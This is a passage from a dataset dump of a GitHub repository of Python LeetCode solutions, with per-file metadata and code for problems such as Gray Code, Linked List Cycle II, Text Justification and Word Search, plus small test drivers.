"text": "class Solution:\n # @return a list of integers\n def grayCode(self, n):\n '''\n The gray code is a binary numeral system where two successive values differ in only one bit.\n\nGiven a non-negative integer n representing the total number of bits in the code, print the sequence of gray code. A gray code sequence must begin with 0.\n\nFor example, given n = 2, return [0,1,3,2]. Its gray code sequence is:\n\n00 - 0\n01 - 1\n11 - 3\n10 - 2\n\nNote:\nFor a given n, a gray code sequence is not uniquely defined.\n\nFor example, [0,2,3,1] is also a valid gray code sequence according to the above definition.\n\nFor now, the judge is able to judge based on one instance of gray code sequence. Sorry about that.\n '''\n res = [0]\n for i in range(0, n):\n res += reversed([r | (1 << i) for r in res])\n return res\n\nn1 = 1\nn = n1\nprint(n)\nprint(Solution.grayCode(Solution(), n))"
},
{
"alpha_fraction": 0.4784291982650757,
"alphanum_fraction": 0.49059733748435974,
"avg_line_length": 22.802631378173828,
"blob_id": "32d54a190b2e718eb527c96d8438d9720105a813",
"content_id": "a88ec3383725f2f1e3be222355eba89774337f02",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1808,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 76,
"path": "/Linked List Cycle II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return a list node\n def detectCycle(self, head):\n \"\"\" Given a linked list, return the node where the cycle begins. If there is no cycle, return null.\n\nFollow up:\nCan you solve it without using extra space? \"\"\"\n if head is None:\n return head\n slow = head\n fast = head.next\n while slow and fast and slow != fast:\n if slow:\n slow = slow.next\n if fast:\n fast = fast.next\n if fast:\n fast = fast.next\n if slow is None or fast is None:\n return None\n tmp = slow.next\n cyclesize = 1\n while tmp != slow:\n tmp = tmp.next\n cyclesize += 1\n #print(x, m, cyclesize, slow.val)\n x = cyclesize\n p2 = head\n p1 = head\n while x > 0:\n p2 = p2.next\n x -= 1\n while p2 != p1:\n p2 = p2.next\n p1 = p1.next\n return p2\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n def __str__(self):\n # print(\"in str\")\n tmp = self\n strs = []\n while tmp.next is not None:\n strs.append(str(tmp.val) + \"->\")\n tmp = tmp.next\n else:\n strs.append(str(tmp.val) + \";\")\n return \"\".join(strs)\n\n\nin0 = [3, 2, 0, -4]\n\nins = [in0]\n\nfor tin in ins:\n head = ListNode(0)\n tail = head\n for val in tin:\n tail.next = ListNode(val)\n tail = tail.next\n ss = Solution()\n print(head)\n tail.next = head.next.next\n print(ss.detectCycle(head.next).val)\n print()"
},
{
"alpha_fraction": 0.49041712284088135,
"alphanum_fraction": 0.4998120963573456,
"avg_line_length": 28.25274658203125,
"blob_id": "a97f2cd0bbbc7ccf70cb283284bda6d7eac27d96",
"content_id": "5e4b4c3c48f2f8bc0c5a47a859ceb0cb68cc3a26",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2661,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 91,
"path": "/Partition List.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @param x, an integer\n # @return a ListNode\n def partition(self, head, x):\n '''\n Given a linked list and a value x, partition it such that all nodes less than x come before nodes greater than or equal to x.\n\nYou should preserve the original relative order of the nodes in each of the two partitions.\n\nFor example,\nGiven 1->4->3->2->5->2 and x = 3,\nreturn 1->2->2->4->3->5. \n '''\n def two_list(head, x):\n smallHead = ListNode(0)\n smallTail = smallHead\n largeHead = ListNode(0)\n largeTail = largeHead\n while head:\n if head.val < x:\n smallTail.next = head\n smallTail = smallTail.next\n head = head.next\n smallTail.next = None\n else:\n largeTail.next = head\n largeTail = largeTail.next\n head = head.next\n largeTail.next = None\n smallTail.next = largeHead.next\n return smallHead.next\n def two_pointer(head, x):\n dummyHead = ListNode(0)\n dummyHead.next = head\n small = dummyHead\n while small.next and small.next.val < x:\n small = small.next\n nextsmall = small\n while nextsmall.next:\n while nextsmall.next and nextsmall.next.val >= x:\n nextsmall = nextsmall.next\n if not nextsmall.next:\n break\n t = nextsmall.next\n nextsmall.next = nextsmall.next.next\n t.next = small.next\n small.next = t\n small = t\n return dummyHead.next\n return two_pointer(head, x)\n #return two_list(head, x)\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n def __str__(self):\n # print(\"in str\")\n tmp = self\n strs = []\n while tmp.next is not None:\n strs.append(str(tmp.val) + \"->\")\n tmp = tmp.next\n else:\n strs.append(str(tmp.val) + \";\")\n return \"\".join(strs)\n\n\nin0 = [1, 4, 3, 5, 2]\n\nins = [in0]\n\nfor tin in ins:\n head = ListNode(0)\n tail = head\n for val in tin:\n tail.next = ListNode(val)\n tail = tail.next\n ss = Solution()\n print(len(tin), tin)\n # print(head)\n print(ss.partition(head.next, 3))\n print()"
},
{
"alpha_fraction": 0.5115070343017578,
"alphanum_fraction": 0.5356347560882568,
"avg_line_length": 31.865854263305664,
"blob_id": "4a6136f4393584793a9cb3bd58a0bfec199b4839",
"content_id": "32b01fc719fb032fef7829fca10611335ea7b83f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2704,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 82,
"path": "/Combination Sum II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param candidates, a list of integers\n # @param target, integer\n # @return a list of lists of integers\n def combinationSum2(self, candidates, target):\n '''\n Given a collection of candidate numbers (C) and a target number (T), find all unique combinations in C where the candidate numbers sums to T.\n\nEach number in C may only be used once in the combination.\n\nNote:\n\n All numbers (including target) will be positive integers.\n Elements in a combination (a1, a2, … , ak) must be in non-descending order. (ie, a1 ≤ a2 ≤ … ≤ ak).\n The solution set must not contain duplicate combinations.\n\nFor example, given candidate set 10,1,2,7,6,1,5 and target 8,\nA solution set is:\n[1, 7]\n[1, 2, 5]\n[2, 6]\n[1, 1, 6]\n '''\n res = self.use_dp(candidates, target)\n return res\n\n #candidates.sort()\n #res = []\n #self.dfs(candidates, 0, target, [], res)\n #return res\n\n #TLE\n def dfs(self, candidates, i, v, nowlist, res):\n if v == 0:\n res.append(list(nowlist))\n return\n if v < 0:\n return\n for start in range(i, len(candidates)):\n nowlist.append(candidates[start])\n self.dfs(candidates, start + 1, v - candidates[start], nowlist, res)\n nowlist.pop()\n while i < len(candidates) and candidates[i] == candidates[i - 1]:\n i += 1\n\n def use_dp(self, candidates, target):\n p = [set() for i in range(target + 1)]\n f = [False] * (target + 1)\n f[0] = True\n candidates.sort(reverse=True)\n dic_count = {}\n for i in range(len(candidates)):\n if candidates[i] not in dic_count:\n dic_count[candidates[i]] = 0\n dic_count[candidates[i]] += 1\n for j in range(target, candidates[i] - 1, -1):\n if f[j - candidates[i]]:\n f[j] = True\n p[j].add(j - candidates[i])\n res = []\n self.path_dfs(dic_count, p, target, [], res)\n return res\n\n def path_dfs(self, dic_count, path, v, nowlist, res):\n if v == 0:\n res.append(list(nowlist))\n return\n for par in path[v]:\n if dic_count[v - par] == 0 or (len(nowlist) > 0 and v - par < nowlist[len(nowlist) - 1]):\n continue\n nowlist.append(v - par)\n dic_count[v - par] -= 1\n self.path_dfs(dic_count, path, par, nowlist, res)\n dic_count[v - par] += 1\n nowlist.pop()\n\n\na0 = [10, [2, 3, 6, 7]]\na1 = [12, [10, 1, 2, 7, 6, 1, 5]]\na = a1\nprint(a)\nprint(Solution.combinationSum2(Solution(), a[1], a[0]))"
},
{
"alpha_fraction": 0.4621676802635193,
"alphanum_fraction": 0.4877300560474396,
"avg_line_length": 21.25,
"blob_id": "cadf417a0b7dbb930ca83d304bd24cd1343278ab",
"content_id": "a21f343a293b850a12e2483d578c24163bf2f1df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 978,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 44,
"path": "/Subsets II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param num, a list of integer\n # @return a list of lists of integer\n def subsetsWithDup(self, S):\n '''\n Given a collection of integers that might contain duplicates, S, return all possible subsets.\n\nNote:\n\n Elements in a subset must be in non-descending order.\n The solution set must not contain duplicate subsets.\n\nFor example,\nIf S = [1,2,2], a solution is:\n\n[\n [2],\n [1],\n [1,2,2],\n [2,2],\n [1,2],\n []\n]\n '''\n S.sort()\n def dfs(a, now, res):\n res.append(list(now))\n if len(a) == 0:\n return\n for i in range(len(a)):\n if i > 0 and a[i] == a[i - 1]:\n continue\n now.append(a[i])\n dfs(a[i + 1:], now, res)\n now.pop()\n res = []\n dfs(S, [], res)\n return res\n\na1 = [1, 2, 2]\na2 = [1, 2, 3]\na = a1\nprint(len(a), a)\nprint(Solution.subsetsWithDup(Solution(), a))"
},
{
"alpha_fraction": 0.5150150060653687,
"alphanum_fraction": 0.5412912964820862,
"avg_line_length": 35.02702713012695,
"blob_id": "623b45cdc3f981452e3d68e18727070fa88be9c3",
"content_id": "f42b598e44f0c62f9b500b1c308a19f0228f1014",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1332,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 37,
"path": "/Maximum Product Subarray.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A, a list of integers\n # @return an integer\n def maxProduct(self, A):\n ''' Find the contiguous subarray within an array (containing at least one number) which has the largest product.\n\nFor example, given the array [2,3,-2,4],\nthe contiguous subarray [2,3] has the largest product = 6. '''\n min_positive = 0\n max_negetive = 0\n max_product = A[0]\n now_product = 1\n for a in A:\n if a == 0:\n now_product = 1\n max_negetive = 0\n min_positive = 0\n max_product = max(max_product, 0)\n continue\n now_product *= a\n max_product = max(now_product, max_product)\n if min_positive > 0:\n max_product = max(max_product, now_product // min_positive)\n if max_negetive < 0:\n max_product = max(max_product, now_product // max_negetive)\n if now_product > 0 and (min_positive == 0 or now_product < min_positive):\n min_positive = now_product\n if now_product < 0 and (max_negetive == 0 or now_product > max_negetive):\n max_negetive = now_product\n return max_product\n\na1 = [2, 0, 3, -1, 4]\na2 = [2,-5,-2,-4,3]\na = a2\nprint(a)\ns = Solution()\nprint(s.maxProduct(a))"
},
{
"alpha_fraction": 0.5843740105628967,
"alphanum_fraction": 0.5920588970184326,
"avg_line_length": 40.6533317565918,
"blob_id": "d4ef81e0bfffd4f0fd0030a5572559a8d1ed5e26",
"content_id": "58d8386d2b0664cb631f540c4479a36f01f742a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3123,
"license_type": "no_license",
"max_line_length": 227,
"num_lines": 75,
"path": "/Text Justification.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param words, a list of strings\n # @param L, an integer\n # @return a list of strings\n def fullJustify(self, words, L):\n '''\n Given an array of words and a length L, format the text such that each line has exactly L characters and is fully (left and right) justified.\n\nYou should pack your words in a greedy approach; that is, pack as many words as you can in each line. Pad extra spaces ' ' when necessary so that each line has exactly L characters.\n\nExtra spaces between words should be distributed as evenly as possible. If the number of spaces on a line do not divide evenly between words, the empty slots on the left will be assigned more spaces than the slots on the right.\n\nFor the last line of text, it should be left justified and no extra space is inserted between words.\n\nFor example,\nwords: [\"This\", \"is\", \"an\", \"example\", \"of\", \"text\", \"justification.\"]\nL: 16.\n\nReturn the formatted lines as:\n\n[\n \"This is an\",\n \"example of text\",\n \"justification. \"\n]\n\nNote: Each word is guaranteed not to exceed L in length.\n\nclick to show corner cases.\nCorner Cases:\n\n A line other than the last line might contain only one word. What should you do in this case?\n In this case, that line should be left-justified.\n '''\n def processLine(thisLineWords, thisLineWordLen, ans, lastLine = False):\n if lastLine:\n postSpaces = \"\".join([' '] * (L - thisLineWordLen - len(thisLineWords) + 1))\n ans.append(\" \".join(thisLineWords) + postSpaces)\n return\n if len(thisLineWords) == 1:\n postSpaces = \"\".join([' '] * (L - thisLineWordLen))\n ans.append(thisLineWords[0] + postSpaces)\n elif len(thisLineWords) > 1:\n baseSpacesLen = (L - thisLineWordLen) // (len(thisLineWords) - 1)\n remainSpaces = (L - thisLineWordLen) % (len(thisLineWords) - 1)\n baseSpaces = \"\".join([\" \"] * baseSpacesLen)\n thisLine = thisLineWords[0]\n for i in range(1, len(thisLineWords)):\n if remainSpaces > 0:\n remainSpaces -= 1\n thisLine += baseSpaces + \" \" + thisLineWords[i]\n else:\n thisLine += baseSpaces + thisLineWords[i]\n ans.append(thisLine)\n ans = []\n thisLineWords = []\n thisLineWordLen = 0\n for word in words:\n if len(word) + thisLineWordLen + len(thisLineWords) <= L:\n thisLineWordLen += len(word)\n thisLineWords.append(word)\n else:\n processLine(thisLineWords, thisLineWordLen, ans)\n thisLineWordLen = len(word)\n thisLineWords = [word]\n processLine(thisLineWords, thisLineWordLen, ans, True)\n return ans\n\ns1 = [16, [\"This\", \"is\", \"an\", \"example\", \"of\", \"text\", \"justification.\"]]\ns2 = [12, [\"What\",\"must\",\"be\",\"shall\",\"be.\"]]\ns = s2\nprint(s[0], s[1])\nans = Solution.fullJustify(Solution(), s[1], s[0])\nfor line in ans:\n print(line)"
},
{
"alpha_fraction": 0.4040728807449341,
"alphanum_fraction": 0.4394426643848419,
"avg_line_length": 25.685714721679688,
"blob_id": "1865f3fd89e65924d2dd7c3ed56faea31f97f55d",
"content_id": "6effa5472ec79cec21a8e1791ccdcc62fe51e1b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 933,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 35,
"path": "/Add Binary.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param a, a string\n # @param b, a string\n # @return a string\n def addBinary(self, a, b):\n '''\n Given two binary strings, return their sum (also a binary string).\n\nFor example,\na = \"11\"\nb = \"1\"\nReturn \"100\". \n '''\n ia = list(reversed([ord(c) - ord('0') for c in a]))\n ib = list(reversed([ord(c) - ord('0') for c in b]))\n ic = [0] * (max(len(ia), len(ib)) + 1)\n x = 0\n for i in range(len(ic)):\n ic[i] = x\n if i < len(ia):\n ic[i] += ia[i]\n if i < len(ib):\n ic[i] += ib[i]\n x = ic[i] // 2\n ic[i] %= 2\n while len(ic) > 1 and ic[len(ic) - 1] == 0:\n ic.pop()\n return ''.join(list(reversed([chr(x + ord('0')) for x in ic])))\n\na1 = ['101011', '1']\na2 = ['1', '1']\na = a2\nprint(a[0])\nprint(a[1])\nprint(Solution.addBinary(Solution(), a[0], a[1]))"
},
{
"alpha_fraction": 0.5058746933937073,
"alphanum_fraction": 0.5300261378288269,
"avg_line_length": 22.953125,
"blob_id": "e9213921795d282b5621baa9189d1b7b950578f2",
"content_id": "a2bf9dba888cfd194ed5c259aa7e276bca0f9c0b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1532,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 64,
"path": "/Binary Tree Level Order Traversal II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return a list of lists of integers\n def levelOrderBottom(self, root):\n '''Given a binary tree, return the bottom-up level order traversal of its nodes' values. (ie, from left to right, level by level from leaf to root).\n\nFor example:\nGiven binary tree {3,9,20,#,#,15,7},\n\n 3\n / \\\n 9 20\n / \\\n 15 7\n\nreturn its bottom-up level order traversal as:\n\n[\n [15,7],\n [9,20],\n [3]\n]\n\nconfused what \"{1,#,2,3}\" means? > read more on how binary tree is serialized on OJ.'''\n if root is None:\n return []\n queue = [[root, 0]]\n res = []\n curdepth = 0\n curlist = []\n while len(queue) > 0:\n node, depth = queue.pop(0)\n if depth > curdepth:\n curdepth = depth\n res.append(list(curlist))\n curlist = []\n curlist.append(node.val)\n if node.left:\n queue.append([node.left, depth + 1])\n if node.right:\n queue.append([node.right, depth + 1])\n res.append(list(curlist))\n res.reverse()\n return res\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\ns = Solution()\nt0 = TreeNode(1)\nt1 = TreeNode(2)\nt0.left = t1\nprint(s.levelOrderBottom(t0))"
},
{
"alpha_fraction": 0.603960394859314,
"alphanum_fraction": 0.6089109182357788,
"avg_line_length": 32.70000076293945,
"blob_id": "744b8c930cb7f7ba62677784c8f1df54e0d66786",
"content_id": "731afdd98c04d015a7739c95bc8d78540c023bc4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1010,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 30,
"path": "/Construct Binary Tree from Inorder and Postorder Traversal.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nclass Solution:\n # @param inorder, a list of integers\n # @param postorder, a list of integers\n # @return a tree node\n def buildTree(self, inorder, postorder):\n '''Given inorder and postorder traversal of a tree, construct the binary tree.\n\nNote:\nYou may assume that duplicates do not exist in the tree. '''\n if len(inorder) == 0:\n return None\n rootval = postorder.pop()\n leftNum = inorder.index(rootval)\n rightNum = len(inorder) - 1 - leftNum\n node = TreeNode(rootval)\n node.left = self.buildTree(inorder[0:leftNum], postorder[0:leftNum])\n node.right = self.buildTree(inorder[leftNum + 1:], postorder[leftNum:leftNum + rightNum])\n return node\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None"
},
{
"alpha_fraction": 0.4242534637451172,
"alphanum_fraction": 0.442461758852005,
"avg_line_length": 32.5,
"blob_id": "8eb4a5e33ede7cf0e6b78f205a88ada0eae4a063",
"content_id": "faa37e5bdbbdc65a0d27620b5bb5e99a16cc5006",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2746,
"license_type": "no_license",
"max_line_length": 483,
"num_lines": 82,
"path": "/Word Search.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n dirs = [[0, -1], [0, 1], [-1, 0], [1, 0]]\n # @param board, a list of lists of 1 length string\n # @param word, a string\n # @return a boolean\n def exist(self, board, word):\n '''\n Given a 2D board and a word, find if the word exists in the grid.\n\nThe word can be constructed from letters of sequentially adjacent cell, where \"adjacent\" cells are those horizontally or vertically neighboring. The same letter cell may not be used more than once.\n\nFor example,\nGiven board =\n\n[\n [\"ABCE\"],\n [\"SFCS\"],\n [\"ADEE\"]\n]\n\nword = \"ABCCED\", -> returns true,\nword = \"SEE\", -> returns true,\nword = \"ABCB\", -> returns false.\n '''\n def checkValid(flag, x, y, m, n):\n return 0 <= x < m and 0 <= y < n and flag[x][y]\n def dfs(word, board, flag, x, y, m, n):\n if word == '':\n return True\n if word[0] != board[x][y]:\n return False\n if len(word) == 1:\n return True\n flag[x][y] = False\n for i in range(len(self.dirs)):\n newp = [x + self.dirs[i][0], y + self.dirs[i][1]]\n if checkValid(flag, newp[0], newp[1], m, n):\n if dfs(word[1:], board, flag, newp[0], newp[1], m, n):\n return True\n flag[x][y] = True\n return False\n\n m = len(board)\n if m == 0:\n return word == ''\n n = len(board[0])\n flag = [[True] * n for row in range(m)]\n for i in range(m):\n for j in range(n):\n if dfs(word, board, flag, i, j, m, n):\n return True\n return False\n\na1 = ['ABCCED', [\n [\"A\", \"B\", \"C\", \"E\"],\n [\"S\",\"F\",\"C\",\"S\"],\n [\"A\",\"D\",\"E\",\"E\"]\n]]\na2 = ['SEE', [\n [\"A\", \"B\", \"C\", \"E\"],\n [\"S\",\"F\",\"C\",\"S\"],\n [\"A\",\"D\",\"E\",\"E\"]\n]]\na3 = ['ABCB', [\n [\"A\", \"B\", \"C\", \"E\"],\n [\"S\",\"F\",\"C\",\"S\"],\n [\"A\",\"D\",\"E\",\"E\"]\n]]\na4s = [[\"gbgptkbnfcxdxdohfcwhyopseabpqsawuinpvqectbfsgtznyxuwolrslukemkagvqxsgcuzfarovsbtqysgjlyvf\",\"izrvbaqrziybczjetxclaxdyrjickfhsebnhdfbcpbeuapatochocmntwvygahagiqplxqonrujuljpzoynqlclhz\",\"lpbtrhbhzpfpfujbdfmowncvaugfipetegmxpqfqhmgmgrplybbuoepqavvikceqksozivqrhyfprucpvdlljbeky\",\"zujdybnrppbkftrfyiyvkpsoaexbkjalelpemcxerboyuifusdrdskttqswacylilamyfmeynsxjcefxixaahtvxn\",\"uxpskxelmesyiqncnwhsbecygefbaeowdeoodubpytpijcnzyutcavagbihdovzszoifklujgmtpogqpajragtiib\",\"plsllkmburlhownaqcqwvhzgabnukxxzipmvbzyvskeiirkywbxrkyxlzmhljeluuzrvaqttcxbkrmjnpiebgdmfq\",\"trzyetufnrgdmbfmepdsaqhiujozxwptnprtknyxegcthhfmziezyoiuzwtwslphcicovdocjqxracfzkjykxigwf\",\"bvzmkjovnfsqtucjrvjvaihjjtjrzfydcapnjgkwlcpezrpsmboojvxupimqqktsklhvtrugulmteblsebgozdkom\",\"wgcjcwvnetivnopackefywkzcayhkovjxzszwpociwxxmpxobdtzzdbddblqsizpkrogieitahqmwqcytvzvbayge\",\"lwwuvleobmzfwsffkteaxewudrvgpekdcgxatdqurpzpjguubyuycsuijsobwyeygbazgrtxiuoscimfhiflbztkr\",\"jlpjrqpsqoajjzsfnkjywqhexsfxosqxfihxyyronsyytsghcrhyiocfgkewcvwjddgdbytqstrllxunqblypqeyc\",\"kwgfspkvwnzuhrmckzojubaxpypfephplpweejbawcwfukkgkyqgzqdoqsvvhemvtizytaasfxzbjjhthxbhnfxgz\",\"vdjzpevzfvthvlmukneuvzdubkkikqhhtsiiydjdycnwpzscpwymwbgzoqhygqhzlpjjtvptzcrpdktsgreeslfgb\",\"mgkfnlqfxzysqtrsliyvbqdsvknipvleevjtjzygawytsrndalabcfwzpljfgulmsugbvejxdhqvaeaapaerfcsxn\",\"bevypiqlqtgucdzluwlawopysjgwddlfjgfyqxjgqpduuehqbuqxiiycreaujlbsugskdbtvsyrocafdvxdffdkwh\",\"ktsyuksdeeifzgzxxncauhvsmcxpowybpqzjcrogvxnvdoucewcygzsscqisogtdzsobjdkhcxcfmwjsvmqbllvpd\",\"dirmdulwkohnyorwswkrgcmuupffkxiqhzckvpigdqvegnczlmqtqepktvsductbexlzowhumfyuuavfonberqqmn\",\"kqhnlktlwuzscvgjtcdtykjllnfegrtqjdfvnyijtjdxflgyojuotdzhtgnbygrhjzezxoksyopdbvbrgxfcdhjwn\",\"yxlgqvsrbrpqbhorzrtuukdsqfxzqtmosawkvocyhtojcccbvvysibmaijzyelmynkiizmjghxrkcunzrnrzqdbym\",\"awqokobvzmwnvevswhwsuwjknlatozfpvyfgmgbnszbpdyibfgtbcflssolgnqxiqcqdjtsdsvtwtdxajtcoapisd\",\"taslybcathlnbpfxkdqpdrywvowmwqsrqkdonhrjocwptdmfjfumyvkvlihiybzqoehdlambcityohfxmalmxvhid\",\"rqdssviwcmkcylhhghxomuaohplcwuhnmmighqfkepodcvmjejxrfzfmotqnpxcblkisdnehetmgqyrvhomoqtceo\",\"srdruhcgpxlebvkuhqlgkgpyugopivgdojuiqzrhwcnxxxufqfnancyjkpytmewaqsjitcqpefpedjjtqytdctmnk\",\"mgwtezlwktqmlhqrwuwhfpxfkcifqxqffoyjnlhzezlshejfahpgwonirxnhufozwmilzslgryyacjidqxlolywew\",\"loqtcsrrcequpwoouoqdwvvvgjhfhndtbvoenhvqllmdiarerjiphdlnpuuwhxrltfpimkaavndfpukgfuymzlcof\",\"wlouczpiqxwaywylzdcvpldjjrjutxbqirmltbvjytkwqkjrpmpfzsqilzefzhxjylwrmtdmnnjfzuyointhhmrtl\",\"vamczwdkuuyoxkbmvgnqecauxibjzwxxyjbzhejcbjqaurnpzchfeizcsdntbkqcusbdynfzwvaqopiprpvwzwarb\",\"nnfadhuxizwxfxwcxotowigofeneehftumtztpzepxbwuxyuorikcoahsolyxtutfpsbftfwqislishwmpioejxyz\",\"lzygvrnklopfvnxgfkoarmmhwcnfbngmoeujviujwlouzlagwqgncuwawjgyzmmnrhxoptxnenhfzhoxxumbplcnu\",\"klvyyjpfggwbdjhtrnuabryxfboqdcnpniontfublqcrckktzetcxtzevovaqksfugvolppziusmeeffiahhwilty\",\"ivqunwpttfhiwisqaewelbooixmtifrtainogejzjsjgaeycivgwwwmhtyaeftxfbkvjphiazuiayhcicleajqhdq\",\"jhvdedgqaqhhyijsqlszpbbafemylpqxymaergurwcbxmkrexkemlhpslbszsjwqxyuogqhfukcguvltfpgsyxnky\",\"hlqqhiphefnupspzwvwsipzxvuwshisotkhcsylweytvtiurfqjoglndhlyotqeodnsvoduuenpxxjocaasgngjur\",\"jknaqddewasbwofjdcimtlmtfuglgcfpmurcxwivxcxtqefthnicawvgrdtzfyotsivseendimxzreuarccuzzcse\",\"vrjwheopziwfyzokypdcjdwohsniuhmpyxlhbczdkvkiwyvvpyzbevpnnewjlkzlimsjorobozllzgiphhqnfhcul\",\"aewlfhtrbegvvhjuswtbekkocxtjbpwctsnybiqdmyahhjdbixcojmcmlvxnlupgmefqmxvavvkegnfomidwwfikd\",\"hzqbqwoudggcbizwsdcijtutwsrdcbgkaylsxbmchufidegxkjftccoaufdzhmjjkuchyqkflrqqxwphhxclzqnvy\",\"rufffqpcuzanjhacxqzwhjfelrfeebcxxjcfzuhwtjjeqjgobhmiqrpckuirxkoxttcunlsiudokmuapdoaugpyql\",\"ghlsyiltmhixasrdgdscghfujzcaztmhcxzchkxtufquxjzdorfubnrkotnoobvtaxvhhtcdauxadxdtqloryhema\",\"tcpuaiuxfdgafkdbjdeggxztnqtuwgxpkmlkwhhdkogryjsjmyquypqlhjierfvcthmrowwbkcuknntbnlylcozmz\",\"jqrontjuhaldwmpbiboxxqliqynexzfgrwwerfbbhogecwhkxviwntffrulrtrzknwqhdrilhorjmyumveilzpqsj\",\"cjevlqkjhrmabzissteqpsotdbssrlevwkqhbbqiufkwgsqzowrdpfxsipmaasxxdqgerxoneylktbjhydkpkhjtz\",\"vvbosatihxbgnpklawgeinclatvjcoizjknemimthqzuflghiolqcpbciynmnwmyibcukpqrhpmmduvlijdmagqje\",\"exrcjqklugxjwosocgtycejnjvnpmytswnuffgszmpllgdbikuhmaqbjnoybnttjgnqltjniyyvgbwpnsybsqcddr\",\"dhewanfqdsjoftpdovhmmugkwacydipipvhpimfoerekmtpdrwrdtyqpyspechmrctjnfqdmjhywdnbumsxhqnypi\",\"ntkwhezbnoidrunyulbkmvyevfxkfmsshfrqjsrwgcbxyqxtbbdpybutitenfyhodygoqamwcovagvtiwyzubtqjo\",\"wytugjagsoxsdvurtwxoshkqhgucydruemrkytqqhpkmnedgcdwumintohypmrjqdcadvtvfkfrxjvfmabimjviac\",\"gppxafcdigadbfnjxnsuugwwrihmqjryagxdnaixiicloqunfphzxdxonfdgquerccurecpomrzajunolwqibnzps\",\"cvlybcafytjckxoezrnveegdwqejpvetqprurtzrpltzijdjatehzkkvbqesmimezfasbajqlepvqvfqojzpujkxc\",\"qpqbdwalxtmxeeklvfbqmrgwrvschrgyiwbmtbzqwlpdpbomipdvijtbhngoemoojpcetbwpolufoiswzvrigkjnz\",\"pefesuniwtdapuocpuqxmmxjghpssfskjxodtdnswqsnlgpachzqvyzbhruawmkhlakfdyxzorobzfdcmdujdwlln\",\"fnltzsezelcckdtbrudwahkdbtixgvmnkxgjrniwakalpvogstesaqxemfdsdqgnnoxhbffcsfphdfqvzwnznkdzr\",\"htuzzioohvrmavgikqlqgipcvqrfwsyfmtendsdkqxysshcdxpvdxmhsezzatyhhtlvwgaiyxiqspvvmksrigzcka\",\"clvcudxgavoadmalesbzppmhhupiyzicmfehidpiydjbrlpxdqzshlbohqwfpgicmolwsafqdqswbhtezuyifzxmr\",\"vuiecmsqxoixtbcjvymeuqdoqnwrkkiiermgfezdsjaokfxffkjzcoqtcokoyvwdokltqkwjuzxggwoliznlofgst\",\"sirpfudrgxisvtowqvcoloxkdkyiqsbkbsaipdzxcjpyceuubzjmngwqqxairbusvuakachcnzcqdzkgytunbsftp\",\"fbjgwbdseosixxvwzlbyyhyrdlvwsonxswfqyjkezdowajtbxuaveaoholdgatgupnmpwwvxzjubtpdslfnrfdztp\"], \"crzilpvxgu\"]\n\na4 = [a4s[1], []]\nfor i in range(len(a4s[0])):\n a4[1].append([])\n for c in a4s[0][i]:\n a4[1][i].append(c)\nal = [a1, a2, a3, a4]\nfor k in range(len(al)):\n a = al[k]\n print(a[0], len(a[1]), len(a[1][0]))\n #for i in range(len(a[1])):\n # print(a[1][i])\n print(Solution.exist(Solution(), a[1], a[0]))"
},
{
"alpha_fraction": 0.570588231086731,
"alphanum_fraction": 0.5764706134796143,
"avg_line_length": 31.69230842590332,
"blob_id": "bd4aa3e5ac8cfa8a9f3db714d3d52437cdd4e7b8",
"content_id": "60eb9711dfcad6ba540ab630219bf16619762c9e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 850,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 26,
"path": "/Balanced Binary Tree.py",
